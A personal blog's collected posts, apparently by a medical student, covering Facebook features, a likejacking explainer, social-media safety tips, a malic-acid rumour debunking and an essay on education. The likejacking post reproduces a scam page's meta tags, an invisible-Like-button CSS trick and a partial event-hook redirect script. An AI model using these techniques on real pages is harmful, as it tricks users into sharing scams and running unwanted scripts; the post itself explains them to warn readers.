Things To Be Expected On Facebook.

Facebook is in a period of change where, where they are going to add new features and the highly expected app center.

Today when I logged in to Facebook, I found this unusual icon in the side bar called “Connection Search”, it’s actually a way of finding friends like “Contact search”, so when I clicked on the Connection search icon this page appeared. Click to see the large image.

Facebook connection search, a thing to expect?

So is this a something to expect on Facebook? I asked some of my friends and no one has ever seen something called “Connection Search” before.Sadly the feature is still not available for me.

The other interesting thing here is the Tweet button. I think this is the first time, we’ve seen an actual Tweet button on a main Facebook page.

Facebook is also about to roll something new features called “Trending Videos”, where they are going to put popular public videos on Facebook. Just like what’s hot on Google Plus.

I’ll put a screen cap, when I see “Trending Videos” on my timeline.

The Facebook App Center will look like this :

Facebook AppCenter


How Facebook Likejacking Can Be Used To Trigger Malicious Scripts.

Facebook Like Jacking is another method of click jacking, where a user clicks a hidden like button that will share a link with the user’s friends without the user’s knowledge.

Although Facebook has reduced the Like jacking incidents, recently there was rise of likejacking scams.Therefor I decided to write a post explaining the mechanisms how these likejacking scams work. I’ve written a post about the malicious Facebook browser extensions that can be found in my old blog.

I’m not going to talk about what is clickjacking and likejacking, I’m going to show the mechanism of how likejacking works and how it can be used to trigger a malicious script once the Like button is clicked.

So a typical clickjacking scam page are most of the time designed to looks like YouTube, Facebook page or video frame to trick the user in thinking it’s a legitimate website, well it can come in any form. The bottom line is the website is designed to trick the users.

So I went to the clickjacking website that’s there in the Naked Security blogpost, and saved it’s code. You can find the HTML code of the website here :

Basically it’s a simple website that’s made to look like a video frame, it’s a pretty simple HTML code with some javascripts. If you start looking from the code from the top, the first thing you should see is the meta tags.

<meta property="og:title" content="[VIDEO] Snake Eats MAN!"/>
<meta property="og:site_name" content="[VIDEO] Snake Eats MAN" />
<meta property="og:image" content="" />
<meta property="og:description" content="CAUGHT ON TAPE- A Giant Snake Swallows Up A Zookeeper in Front of Hundreds of People!" />
<meta property="og:type" content="website" />
<meta property="fb:admins" content="38305883" />

These meta tags allow a malicsious attacker to change the picture, title, message of the post that’s being posted on the Facebook time line irrespective of the contents of the website.

Then comes the Like button code, it’s a bit different in this webpage. Usually it’s the same Like button code. Click to see the large image.

However there is a small modification to this code, the like button is hidden with the small CSS trick, so the user won’t know that he’s clicking a like button.

  filter:alpha(opacity=0); /* For IE8 and earlier */

So the hidden Like button iframe code will look like this, click to see the large image.

In this website, it’s used like this, click to see the large image.

With the help of some more CSS trick the hidden Like button can be placed near a fake play button image, so that when the play button is clicked, the user will click the hidden Like button and without knowing the user will share the post in his timeline.

Up to here it’s pretty much simple stuff, however there is a small function called “FB.Event.subscribe” let’s a malicious user to trigger an event can be used to trigger a malicious script once the like button is clicked. Most scammers use this to load a survey that will give scammers money. However, this can also be used to trigger a malicious javascript once the Like button is clicked, even if the Like  button is not hidden.

In the following likejacking scam it’s used like this,

<script charset="utf-8" type="text/javascript">
FB.Event.subscribe('edge.create', function(response) {
        window.location = window.money_page;

However, a malicious attacker can modify the script to look like this, this will load a malicious javascript once the like button is clicked. So the victim will not suspect.

<script charset="utf-8" type="text/javascript">
FB.Event.subscribe('edge.create', function(response) {

Staying Frosty On Facebook.

We say we’re living in a digital world and how people are connected through the internet more than ever. However, when it comes to using social networking most people are still very primitive. The latest addition to this came yesterday when a teacher was blackmailed on Facebook into sex by the suspect who befriended her on Facebook (News Here).

I think the reason for people to act differently online than in real life is a very complex one, social networking has only been here for like 10 years and most people on Facebook have been there since 2008 or later so most probably they’ve been social networking for only 4 years or less. It’s a new thing for all human beings and people have failed to understand the differences and similarities in real life and life online.

  • What makes people not to share their photos with everyone in real life while sharing them with everyone in the world on Facebook?
  • What makes people not be friendly and talk with strangers in real life while people accept every friend request on Facebook without even knowing that person exist in real life?and believe what they say.
  • What makes people not to share their private information in real life while they share everything what comes to their mind on Twitter?
Some good comments on the article “Teacher blackmailed into sex on Facebook” : 

I think people, specially children needed to be taught how to be safe on social networking and internet safety practices before they starting to use internet as we do with other things in real life. However, the fascinating thing is because internet and social networking has been there for a very short time it’s a new thing even for parents, and parents themselves don’t know how to be safe when it comes to being online.

I think I was lucky in that way because I started learning about computers and internet when I was 10 (I didn’t have my own computer, I got my first when I was 12) and I read the news and stories about how people got into trouble thanks to the internet. And when I got my own internet connection in 2010 when I was 20, I know how to protect myself on the internet and for me so far so good.

Being blackmailed into sex on Facebook is not the only thing that can happen to a person, there is an increasing trend where beautiful photos of girls are being posted on popular forums and sometimes even on porn forums, which can affect you for the rest of your life. These photos are then being used by other people in making fake profiles under fake names.

It’s amazingly simple for a fake profile on Facebook to get information from someone that they normally don’t share in real life, from mobile numbers to personal stories. Specially if you use a female profile it’s really easy to get information from both males and females alike.

This video on from Tom Ryan shows how easily how got access to military classifid information by using a fake profile called Robin Sage  : Tom Ryan | Palantir Technologies

There is another danger that you don’t understand in adding unknown people on Facebook. You can hack ANY, YES ANY Facebook account, if you can add 3 profiles in to your target profile. I won’t going to reveal the process, but trust me it’s very simple to hack any Facebook profile if you can slip 3 friends.

How to stay safe : 

  • Try to stay anonymous as possible, don’t even give your real date of birth to Facebook, Facebook only need it to confirm you are above the age to have a Facebook account.
  • Don’t add unknown people on Facebook, if you do make sure they don’t see personal stuff you post on Facebook.
  • Always use two factor authentication, so it’ll make your Facebook account almost always bullet proof. You can activate two factor authentication from the security settings on Facebook.
  • Don’t post any photos of you on Facebook, and it’s better to not to let others take photos of you if they are going to post them on Facebook.
  • And importantly learn how to be safe online before you jump into it.

NoLimit Is Not Serving Harmful Toffees, The Truth Is Out There.

This is the new year season and one of the biggest fashion lines that people go to buy clothes for the new year is No Limit. Recently there has being a huge increase of the popular toffee scam message associated with No Limit. The spam is mainly circulated via Facebook, Twitter and emails. If you sum up the message goes  like this:

At No Limit showrooms they are serving their customers a toffee that contains  Malic Acid. And this toffee is very dangerous for pregnant woman and can also make males infertile, and this is a plot by No Limit fashion line owned by a Muslim Businessman to make the Sinhala People (majority in Sri Lanka) infertile so one day the Muslims will become the majority.

First of all I don’t know why No Limit is serving a toffee in their showrooms, if anyone know the reason leave a comment down below. So I decided to put some light on this matter because most people don’t understand this message and share it without looking more in to this.

She See the Malic Acid in the message, as soon as I first read this message a bell rang in my head,  I’ve heard the word Malic Acid in my bio chemistry lectures and as I remember it’s a harmless substance naturally occurring in the human body, I looked my bio chemistry lectures but I couldn’t find Malic Acid. Yesterday I did some search and found this.

In its ionized form malic acid is called malate

The ever so famous malate, which is a fundamental molecule of all bio chemistry cycles occurring in the human body. The people who are spreading this message is tricking people by using the word malic acid, not malate, the ionized from of malic acid. As most people know acids exist in their ionized form in solutions and also in human body. Therefore malic acid exits as malate in human body.

The people who spread this message on social networks give no reference to where they found this information or how they found Malic Acid is not good for health. However I did some search at PubMed about malic acid, which a standard websites for medical students to get reliable information about medicine, and it had this to say.

In its ionized form malic acid is called malate. Malate is an intermediate of the TCA cycle along with fumarate. It can also be formed from pyruvate as one of the anaplerotic reactions. In humans, malic acid is both derived from food sources and synthesized in the body through the citric acid cycle or Krebs cycle which takes place in the mitochondria. Malate’s importance to the production of energy in the body during both aerobic and anaerobic conditions is well established.

( is the PubMed website associated with biochemistry)

The PubMed article gives a very good explanation of Malic acid from top to bottom including the simple text I got from above to very highly advanced information, which is alone to put a lid to this case.

Leave out the technical details aside if you don’t understand what this means, basically malate is an intermediate of the energy production pathway in human body. And it is also an important intermediate in Gluconeogenesis (production of Glucose by liver when you are not having food for a long period of time, like in sleep). So without malate you can’t survive, it is an important molecule in human body. Malic acid is also found in apples so if you are afraid of malic acid then you should be affarid of apples too. If you look at the chart below you’ll see how important Malate (malic acid really is)

Image Source Wikipedia, Click to see full size.

More chemical analysis is needed to be done to find out whether the toffee contains any harmful substances but the message going on around Facebook and Twitter is a scam, probably to keep people away from No Limit showrooms during this new year season.

Malic Acid is totally innocent and should not be afraid to take food containing malic acid. If you think I’m wrong give some hard proof from good resources associated with bio-medicine, biochemistry or medicine. So next time think twice about what you are sharing on social media.  TANGO DOWN.

Associated articles : 

Metabocard for L-Malic acid (HMDB00156)  (PubMed)

Malic Acid (Wikipedia)

To Stress The System

Move Fast And Break Things

Everyone on the internet is talking about the Facebook IPO and virtually everything that has to be said about the IPO is now said, and this new Facebook IPO trend made me watch “The Social Network” movie again, (I can’t even remember the number of times I’ve watched the movie.)

The Social Network is an inspirational movie for me, I wanted to write this post form the very first time I’ve watched the movie, but didn’t had any time and a place like this blog, because I haven’t started this blog back in 2010, but I’ve mentioned about these ideas on Twitter from time to time. Most of my colleagues are laughing at the back of their mind when I talk stuff like these, a guy in medical college who can’t even get an A pass for an exam talking about reaching impossible goals, or a guy who is not satisfied being at medical college.

Tell you the truth I’m not satisfied of being at medical college, I strongly believe that this life is ours to enjoy and we don’t have to stuck in offices till we become grand parents. From the beginning I’ve never wanted to work as a doctor for the rest of my life. I only want to stay as a doctor until I make enough money to live the rest of my life, I want to retire quickly and enjoy the rest of my life in peace. Some argue that it is a responsibility for a doctor to serve the need of the poor patients, but come-on we spend the best part of our lives cramping books and inside libraries while others get the chance to enjoy there lives to the fullest in their teen ages, even doctors have the right to enjoy their lives.

I think the problem is in the society that I live in, from the day we enter primary school there is the competition to be the first in the class and when we do Advanced Level there is competition to enter medical college or engineering college, so the only thing that students do is chewing up the books, after entering universities this thing is even worst and 75% of the university time is being spent on studies.

Lets take an example, I’m a medical student, I passed my Advanced Level in my first attempt and got the chance to enter one of the best medical colleges in the country, when I pass out I’ll be 25 years old, without even earning a penny in the 5 years spent at the medical college. Then I won’t be getting a good income until I stabilize in the medical field and that’ll take at least another 10 years, I’ll be 35 by then and I won’t be even half as rich as Mark Zuckerberg when he was 25. This story is even worse who entered the medical college doing his third attempt at advanced level.

I don’t think the problem is with the education system, I think the problem is with students’ mindset, everyone is obsessed getting a first class at medical college and no one wants to do something innovative in their time. at medical college other than studying. The problem is in our college society if someone need to get the respect of others you need to get an extremely good result. And the people who do get an extremely good result won’t care a shit about the people who get a normal result and just pass the exam.

Student need to break this system of being book worms, or else we won’t have someone like Mark, Steve Jobs or David Karp from this education system forever until we change the system, it’s not a problem with the education system, it’s a problem of how we use the system. Break the system or at least stress the system, If each and everyone don’t try to break or stress the system the system will stay the same, but if everyone tried to stress the system them the system will break at some point. If we don’t then we’ll be just like the rest of them spending our lives at offices and doing our job until we become grand parents. But then again what do I know, I’m just another out cast student blogging his random thoughts.

Anything is possible, just keep thinking.